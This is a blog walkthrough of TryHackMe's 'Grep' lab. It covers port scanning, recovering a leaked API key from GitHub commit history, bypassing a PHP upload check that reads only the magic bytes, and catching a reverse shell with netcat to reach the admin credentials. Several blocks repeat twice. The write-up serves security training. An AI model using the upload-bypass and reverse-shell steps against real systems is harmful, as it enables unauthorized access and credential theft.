Mher's Blog
This is the write-up for the Grep Easy Challenge from TryHackMe cybersecurity platform. This room is very good for beginners and it can help them understand the fundementals of OSINT (Open-Source Intelligence), File Upload Vulnerabilities, and the term Reverse Shell.
Grep
Link: https://tryhackme.com/room/greprtp
Difficulty: Easy
Description
Welcome to the OSINT challenge, part of TryHackMe’s Red Teaming Path. In this task, you will be an ethical hacker aiming to exploit a newly developed web application.
SuperSecure Corp, a fast-paced startup, is currently creating a blogging platform inviting security professionals to assess its security. The challenge involves using OSINT techniques to gather information from publicly accessible sources and exploit potential vulnerabilities in the web application.
Start by deploying the machine; Click on the Start Machine button in the upper-right-hand corner of this task to deploy the virtual machine for this room.
Your goal is to identify and exploit vulnerabilities in the application using a combination of recon and OSINT skills. As you progress, you’ll look for weak points in the app, find sensitive data, and attempt to gain unauthorized access. You will leverage the skills and knowledge acquired through the Red Team Pathway to devise and execute your attack strategies.
Note: Please allow the machine 3 - 5 minutes to fully boot. Also, no local privilege escalation is necessary to answer the questions.Welcome to the OSINT challenge, part of TryHackMe’s Red Teaming Path. In this task, you will be an ethical hacker aiming to exploit a newly developed web application.
SuperSecure Corp, a fast-paced startup, is currently creating a blogging platform inviting security professionals to assess its security. The challenge involves using OSINT techniques to gather information from publicly accessible sources and exploit potential vulnerabilities in the web application.
Start by deploying the machine; Click on the Start Machine button in the upper-right-hand corner of this task to deploy the virtual machine for this room.
Your goal is to identify and exploit vulnerabilities in the application using a combination of recon and OSINT skills. As you progress, you’ll look for weak points in the app, find sensitive data, and attempt to gain unauthorized access. You will leverage the skills and knowledge acquired through the Red Team Pathway to devise and execute your attack strategies.
Note: Please allow the machine 3 - 5 minutes to fully boot. Also, no local privilege escalation is necessary to answer the questions.Reconnaissance
I did the enumeration using RustScan.
kali@kali:~/THM/Easy/Grep$ sudo rustscan -a 10.10.186.114 -- -sV -sC -vv -oA rustscan
PORT STATE SERVICE REASON
VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 21:c7:dc:17:44:78:ef:5f:47:c6:b9:39:f7:cb:ba:53 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCU+sdaAaNA5ELzVdxdOB/0SqOZgdzWZyNb3szdNjwvhifzA3u3Bu9q+wxF/WbWf8GAqLd1UgsbFJYDifBU3MZOjwJe2xG03f/VBH2XmU12K4G+Cwh8kvagggicGAwlorQHmm2u+pulKeaibbxB0GbfZlEQswvGknVgJwnslB7G4lzSajcdPedPAr+/3L0QZ+dc37VPwYJwQlS0cngK6RJH/KFdWeeVAF0NY5SIE3l+d3obpUBVRDajWBoq2UvAUTISaFblS0qUOHCfR5SoLmh2yMfQDa/kf4hn6KRIsJ4M0hyuXbKkUqmr/5ZmnZ9N5HQmxByBAP7N72KikRiA2FV1W880fqCs2n5bldIi1yI2QhljxOv+wAbM/rjfSx/5iFpvvjklRijpgkCTdII4E31n9Wtk/hIRx9RcNzvnxUb9VgyvT0fl6qKno+yF5m4fcm5AZCeyBPexCDvZkZPheCfpY4TFA2FB14TQLzL/Zy7ZH4ztk1cwHRBAWIcC3+sMfeE=
| 256 78:13:74:43:7d:d3:b9:af:5f:f2:e7:2d:44:43:a5:5b (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBP++9LW+4Wiy604LwL/r1TeDNPlN1YovNNhHA/uEjwrfbBhFe/9C6hjZOLtrDQ49xcj2lcy35EuI8XY4IW2rzJ4=
| 256 72:6a:ef:4c:22:8d:29:74:b2:41:bd:5d:30:ad:dd:60 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJ4cVRD6b83BLlQqlADWAkc4jYd7A6gNBOGN+yBNyN7D
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.41 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
443/tcp open ssl/http syn-ack ttl 63 Apache httpd 2.4.41
|_http-server-header: Apache/2.4.41 (Ubuntu)
| ssl-cert: Subject: commonName=grep.thm/organizationName=SearchME/stateOrProvinceName=Some-State/countryName=US
| Issuer: commonName=grep.thm/organizationName=SearchME/stateOrProvinceName=Some-State/countryName=US
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-06-14T13:03:09
| Not valid after: 2024-06-13T13:03:09
| MD5: 7295:8ef0:7c16:221c:3b0a:40ee:913c:766c
| SHA-1: 38c2:3ba3:34b1:851a:f1d4:ee0a:37bd:701a:830c:7dd8
| -----BEGIN CERTIFICATE-----
| MIIDFzCCAf8CFGTWwbbVKaNSN8fhUdtf0QT84zCSMA0GCSqGSIb3DQEBCwUAMEgx
| CzAJBgNVBAYTAlVTMRMwEQYDVQQIDApTb21lLVN0YXRlMREwDwYDVQQKDAhTZWFy
| Y2hNRTERMA8GA1UEAwwIZ3JlcC50aG0wHhcNMjMwNjE0MTMwMzA5WhcNMjQwNjEz
| MTMwMzA5WjBIMQswCQYDVQQGEwJVUzETMBEGA1UECAwKU29tZS1TdGF0ZTERMA8G
| A1UECgwIU2VhcmNoTUUxETAPBgNVBAMMCGdyZXAudGhtMIIBIjANBgkqhkiG9w0B
| AQEFAAOCAQ8AMIIBCgKCAQEAtiDNwwY9IR2HADMy6CRAwiPH0s8dIOFGPrbYCbLz
| fDKIWURlczzOlmgpscN/YHHpt6P5ywUPLGnMK3ukYag7xTUYl+vmledTnD9oebnJ
| 6qDweFFwdZ8hysITyvCyGgqcY52JE2nBtVNj6/L16iZ60KKko8opNsTE5IYj/sUt
| PsOxeNiV3oqpOUeKtZJbn7Kssd4KBwnRqTSUlXlPXzeRipAiW5SZZXo6K4YeLVht
| XlLPtPWsMC0fj16DDDtxLlZmvu3J5o9egp/eRpWmvKWIaKQ57Y0MKB8/gso8FxxX
| NiRY9Nru0C3DCUbc/xXywQ9pIGt/Xir++aXhyxCiIGh22QIDAQABMA0GCSqGSIb3
| DQEBCwUAA4IBAQCzhJu52dIY7V/qQleDMEQ1oBLrQoFhHD6+UbvH0ELMAtL5Dc8A
| LGDdyFkgsx04TaZtJ20dyrjYD+tcAgu9Yb7eEYbfqqD5w4XSzvdEuTW2aVL86aT6
| IBbN8SMkX2zfILjHTOR1F7WAoHaIssH0yZltg+lQEEnAeb+XoIZm9cIW2bTNKoO2
| MeHgvSKkQkjROO29XQQ3mTbxFG86UsTwyGHdddnkfiWilXqgfh+wGxbY/wCdhU0C
| TnuXn4IEVdCBn16rCg51kEZZC1EWPcJpv0/InUNfcgumcVY033EXF/HgW4eNDD6H
| XmLEGKfScUWcO0//STDZGZXwf9gt30DqoMSf
|_-----END CERTIFICATE-----
|_http-title: 403 Forbidden
| tls-alpn:
|_ http/1.1
|_ssl-date: TLS randomness does not represent time
51337/tcp open http syn-ack ttl 63 Apache httpd 2.4.41
| http-methods:
|_ Supported Methods: GET HEAD POST
|_http-title: 400 Bad Request
|_http-server-header: Apache/2.4.41 (Ubuntu)kali@kali:~/THM/Easy/Grep$ sudo rustscan -a 10.10.186.114 -- -sV -sC -vv -oA rustscan
PORT STATE SERVICE REASON
VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 21:c7:dc:17:44:78:ef:5f:47:c6:b9:39:f7:cb:ba:53 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCU+sdaAaNA5ELzVdxdOB/0SqOZgdzWZyNb3szdNjwvhifzA3u3Bu9q+wxF/WbWf8GAqLd1UgsbFJYDifBU3MZOjwJe2xG03f/VBH2XmU12K4G+Cwh8kvagggicGAwlorQHmm2u+pulKeaibbxB0GbfZlEQswvGknVgJwnslB7G4lzSajcdPedPAr+/3L0QZ+dc37VPwYJwQlS0cngK6RJH/KFdWeeVAF0NY5SIE3l+d3obpUBVRDajWBoq2UvAUTISaFblS0qUOHCfR5SoLmh2yMfQDa/kf4hn6KRIsJ4M0hyuXbKkUqmr/5ZmnZ9N5HQmxByBAP7N72KikRiA2FV1W880fqCs2n5bldIi1yI2QhljxOv+wAbM/rjfSx/5iFpvvjklRijpgkCTdII4E31n9Wtk/hIRx9RcNzvnxUb9VgyvT0fl6qKno+yF5m4fcm5AZCeyBPexCDvZkZPheCfpY4TFA2FB14TQLzL/Zy7ZH4ztk1cwHRBAWIcC3+sMfeE=
| 256 78:13:74:43:7d:d3:b9:af:5f:f2:e7:2d:44:43:a5:5b (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBP++9LW+4Wiy604LwL/r1TeDNPlN1YovNNhHA/uEjwrfbBhFe/9C6hjZOLtrDQ49xcj2lcy35EuI8XY4IW2rzJ4=
| 256 72:6a:ef:4c:22:8d:29:74:b2:41:bd:5d:30:ad:dd:60 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJ4cVRD6b83BLlQqlADWAkc4jYd7A6gNBOGN+yBNyN7D
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.41 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
443/tcp open ssl/http syn-ack ttl 63 Apache httpd 2.4.41
|_http-server-header: Apache/2.4.41 (Ubuntu)
| ssl-cert: Subject: commonName=grep.thm/organizationName=SearchME/stateOrProvinceName=Some-State/countryName=US
| Issuer: commonName=grep.thm/organizationName=SearchME/stateOrProvinceName=Some-State/countryName=US
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-06-14T13:03:09
| Not valid after: 2024-06-13T13:03:09
| MD5: 7295:8ef0:7c16:221c:3b0a:40ee:913c:766c
| SHA-1: 38c2:3ba3:34b1:851a:f1d4:ee0a:37bd:701a:830c:7dd8
| -----BEGIN CERTIFICATE-----
| MIIDFzCCAf8CFGTWwbbVKaNSN8fhUdtf0QT84zCSMA0GCSqGSIb3DQEBCwUAMEgx
| CzAJBgNVBAYTAlVTMRMwEQYDVQQIDApTb21lLVN0YXRlMREwDwYDVQQKDAhTZWFy
| Y2hNRTERMA8GA1UEAwwIZ3JlcC50aG0wHhcNMjMwNjE0MTMwMzA5WhcNMjQwNjEz
| MTMwMzA5WjBIMQswCQYDVQQGEwJVUzETMBEGA1UECAwKU29tZS1TdGF0ZTERMA8G
| A1UECgwIU2VhcmNoTUUxETAPBgNVBAMMCGdyZXAudGhtMIIBIjANBgkqhkiG9w0B
| AQEFAAOCAQ8AMIIBCgKCAQEAtiDNwwY9IR2HADMy6CRAwiPH0s8dIOFGPrbYCbLz
| fDKIWURlczzOlmgpscN/YHHpt6P5ywUPLGnMK3ukYag7xTUYl+vmledTnD9oebnJ
| 6qDweFFwdZ8hysITyvCyGgqcY52JE2nBtVNj6/L16iZ60KKko8opNsTE5IYj/sUt
| PsOxeNiV3oqpOUeKtZJbn7Kssd4KBwnRqTSUlXlPXzeRipAiW5SZZXo6K4YeLVht
| XlLPtPWsMC0fj16DDDtxLlZmvu3J5o9egp/eRpWmvKWIaKQ57Y0MKB8/gso8FxxX
| NiRY9Nru0C3DCUbc/xXywQ9pIGt/Xir++aXhyxCiIGh22QIDAQABMA0GCSqGSIb3
| DQEBCwUAA4IBAQCzhJu52dIY7V/qQleDMEQ1oBLrQoFhHD6+UbvH0ELMAtL5Dc8A
| LGDdyFkgsx04TaZtJ20dyrjYD+tcAgu9Yb7eEYbfqqD5w4XSzvdEuTW2aVL86aT6
| IBbN8SMkX2zfILjHTOR1F7WAoHaIssH0yZltg+lQEEnAeb+XoIZm9cIW2bTNKoO2
| MeHgvSKkQkjROO29XQQ3mTbxFG86UsTwyGHdddnkfiWilXqgfh+wGxbY/wCdhU0C
| TnuXn4IEVdCBn16rCg51kEZZC1EWPcJpv0/InUNfcgumcVY033EXF/HgW4eNDD6H
| XmLEGKfScUWcO0//STDZGZXwf9gt30DqoMSf
|_-----END CERTIFICATE-----
|_http-title: 403 Forbidden
| tls-alpn:
|_ http/1.1
|_ssl-date: TLS randomness does not represent time
51337/tcp open http syn-ack ttl 63 Apache httpd 2.4.41
| http-methods:
|_ Supported Methods: GET HEAD POST
|_http-title: 400 Bad Request
|_http-server-header: Apache/2.4.41 (Ubuntu)Open ports:
- 22 (SSH)
- 80 (HTTP)
- 443 (SSL/HTTP) (Found grep.thm from the certificate)
- 51337 (HTTP)
Port 80:
Port 443:
Then I added grep.thm into the /etc/hosts file in order to open the website.
Then I was able to see the actual website.
Then I used Feroxbuster to enumurate the directories.
But this didn't really give any information about what is actually going on.
403 GET 9l 28w 274c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404 GET 9l 31w 271c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
302 GET 0l 0w 0c https://grep.thm/ => https://grep.thm/public/html/
301 GET 9l 28w 304c https://grep.thm/api => https://grep.thm/api/
302 GET 0l 0w 0c https://grep.thm/index.php => https://grep.thm/public/html/
301 GET 9l 28w 311c https://grep.thm/javascript => https://grep.thm/javascript/
200 GET 0l 0w 0c https://grep.thm/api/index.php
301 GET 9l 28w 307c https://grep.thm/public => https://grep.thm/public/
301 GET 9l 28w 312c https://grep.thm/api/uploads => https://grep.thm/api/uploads/
[####################] - 12s 18464/18464 0s found:7 errors:7911
[####################] - 11s 4614/4614 426/s https://grep.thm/
[####################] - 9s 4614/4614 523/s https://grep.thm/api/
[####################] - 4s 4614/4614 1050/s https://grep.thm/javascript/
[####################] - 3s 4614/4614 1521/s https://grep.thm/public/403 GET 9l 28w 274c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404 GET 9l 31w 271c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
302 GET 0l 0w 0c https://grep.thm/ => https://grep.thm/public/html/
301 GET 9l 28w 304c https://grep.thm/api => https://grep.thm/api/
302 GET 0l 0w 0c https://grep.thm/index.php => https://grep.thm/public/html/
301 GET 9l 28w 311c https://grep.thm/javascript => https://grep.thm/javascript/
200 GET 0l 0w 0c https://grep.thm/api/index.php
301 GET 9l 28w 307c https://grep.thm/public => https://grep.thm/public/
301 GET 9l 28w 312c https://grep.thm/api/uploads => https://grep.thm/api/uploads/
[####################] - 12s 18464/18464 0s found:7 errors:7911
[####################] - 11s 4614/4614 426/s https://grep.thm/
[####################] - 9s 4614/4614 523/s https://grep.thm/api/
[####################] - 4s 4614/4614 1050/s https://grep.thm/javascript/
[####################] - 3s 4614/4614 1521/s https://grep.thm/public/So I started to crawl the whole website by using Burp Suite.
Question #1
What is the API key that allows a user to register on the website?
I noticed the Register button, but when I tried to register it gave this error Invalid or Expired API key in an alert box.
Then I checked the actual request parameters and saw this.
I noticed an unusual header labeled X-Thm-Api-Key which seemed to be the API Key and was a MD5 hash digest.
So, I thought I could crack it by using this website https://md5hashing.net/ and saw that it's the hash of johncena.
After thinking a little bit, I thought that this is a part of OSINT, but after doing a little bit of research, I gave up, and started to look at the other places.
Then I went back to the main page and saw that This website is under development. which made me think that since it's under development, I might be able to find the source code of this project.
I searched on Google SearchME Github, Grep GitHub about 15 minutes but eventually couldn't find anything, but then I realized that I can search for repositories inside GitHub as well, and used the search filters (Use language PHP), and found this repositories.
I checked every single repository and found that supersecuredeveloper/searchmecms has a simillar file structre as the actual website.
I checked the api/register.php file and found the API Key TBA, I tried using this API key but it didn't work. (TBA stands for to be announced so that makes more sense)
I checked for the older commits and found a commit labeled with Fix: remove key.
I browesed the changes for this commit and found the actual private key which led me register.
Question #2
What is the first flag?
After logging in with the credentials I used to resgister, I was greeted with the first flag.
Question #3
What is the email of the "admin" user?
After checking the website while logged in I went back to the GitHub repository to check for other interesting things, I saw this upload.php in api folder, and as the name suggest this can be a potental way to get a reverse shell.
At first I was trying to upload the shell using curl, but later I found this upload page:
I tried uploading the php-reverse-shell.php but it failed with this error {"error":"Invalid file type. Only JPG, JPEG, PNG, and BMP files are allowed."}
I went back to check the content of the upload.php file and saw that there is a checkMagicBytes() method that reads the first 4 bytes of the file and compares those with $validMagicBytes.
<?php
session_start();
require 'config.php';
$uploadPath = 'uploads/';
function checkMagicBytes($fileTmpPath, $validMagicBytes) {
$fileMagicBytes = file_get_contents($fileTmpPath, false, null, 0, 4);
return in_array(bin2hex($fileMagicBytes), $validMagicBytes);
}
$allowedExtensions = ['jpg', 'jpeg', 'png', 'bmp'];
$validMagicBytes = [
'jpg' => 'ffd8ffe0',
'png' => '89504e47',
'bmp' => '424d'
];
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
if (isset($_SESSION['username'])) {
if (isset($_FILES['file'])) {
$file = $_FILES['file'];
$fileName = $file['name'];
$fileTmpPath = $file['tmp_name'];
$fileExtension = strtolower(pathinfo($fileName, PATHINFO_EXTENSION));
if (checkMagicBytes($fileTmpPath, $validMagicBytes)) {
$uploadDestination = $uploadPath . $fileName;
move_uploaded_file($fileTmpPath, $uploadDestination);
echo json_encode(['message' => 'File uploaded successfully.']);
} else {
echo json_encode(['error' => 'Invalid file type. Only JPG, JPEG, PNG, and BMP files are allowed.']);
}
} else {
echo json_encode(['error' => 'No file uploaded.']);
}
} else {
echo json_encode(['error' => 'User not logged in.']);
}
} else {
echo json_encode(['error' => 'Unsupported request method.']);
}
?><?php
session_start();
require 'config.php';
$uploadPath = 'uploads/';
function checkMagicBytes($fileTmpPath, $validMagicBytes) {
$fileMagicBytes = file_get_contents($fileTmpPath, false, null, 0, 4);
return in_array(bin2hex($fileMagicBytes), $validMagicBytes);
}
$allowedExtensions = ['jpg', 'jpeg', 'png', 'bmp'];
$validMagicBytes = [
'jpg' => 'ffd8ffe0',
'png' => '89504e47',
'bmp' => '424d'
];
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
if (isset($_SESSION['username'])) {
if (isset($_FILES['file'])) {
$file = $_FILES['file'];
$fileName = $file['name'];
$fileTmpPath = $file['tmp_name'];
$fileExtension = strtolower(pathinfo($fileName, PATHINFO_EXTENSION));
if (checkMagicBytes($fileTmpPath, $validMagicBytes)) {
$uploadDestination = $uploadPath . $fileName;
move_uploaded_file($fileTmpPath, $uploadDestination);
echo json_encode(['message' => 'File uploaded successfully.']);
} else {
echo json_encode(['error' => 'Invalid file type. Only JPG, JPEG, PNG, and BMP files are allowed.']);
}
} else {
echo json_encode(['error' => 'No file uploaded.']);
}
} else {
echo json_encode(['error' => 'User not logged in.']);
}
} else {
echo json_encode(['error' => 'Unsupported request method.']);
}
?>This seems broken and can be easly bypassed. Since it just checks the first 4 bytes, we can simply edit the php-reverse-shell.php's first 4 bytes and bypass this "proffesional file extension checker" using the Ghex tool.
And then I uploaded the shell, and got this result {"message":"File uploaded successfully."}
Then turned on the netcat listener.
kali@kali:~/THM/Easy/Grep$ nc -lvnp 4444
listening on [any] 4444 ...kali@kali:~/THM/Easy/Grep$ nc -lvnp 4444
listening on [any] 4444 ...Since the upload.php is in the api folder that means uploads folder is inside the api folder (as specified in the code $uploadPath = 'uploads/';).
So, all I had to to is to just open https://grep.thm/api/uploads/php-reverse-shell.php and done, I got the reverse shell in the netcat listener.
kali@kali:~$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.9.84.107] from (UNKNOWN) [10.10.186.114] 47408
Linux ip-10-10-186-114 5.15.0-1038-aws #43~20.04.1-Ubuntu SMP Fri Jun 2 17:10:57 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
20:39:39 up 1:09, 0 users, load average: 0.00, 0.00, 0.12
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$kali@kali:~$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.9.84.107] from (UNKNOWN) [10.10.186.114] 47408
Linux ip-10-10-186-114 5.15.0-1038-aws #43~20.04.1-Ubuntu SMP Fri Jun 2 17:10:57 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
20:39:39 up 1:09, 0 users, load average: 0.00, 0.00, 0.12
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$After digging a little bit I found a backup folder which contains users.sql file.
The contents of this file contains admin's email address.
Question #4
What is the host name of the web application that allows a user to check an email for a possible password leak?
To check this we just need to take a look at the contents of /etc/hosts file, which contains the actual hostname.
Question #5
What is the password of the "admin" user?
I tried to access the password leak website but it didn't open.
So, I checked the Apache2 config and saw that this password leak website is running on 51337 port, so I appended :51337 to the url to specify the port and the website opened.
Then all I had to is to just write the admin's email to check if it had been leaked, and it gave the admin's password.
Conclusion
This room is very good for beginners and it can help them understand the fundementals of OSINT (Open-Source Intelligence), File Upload Vulnerabilities, and the term Reverse Shell.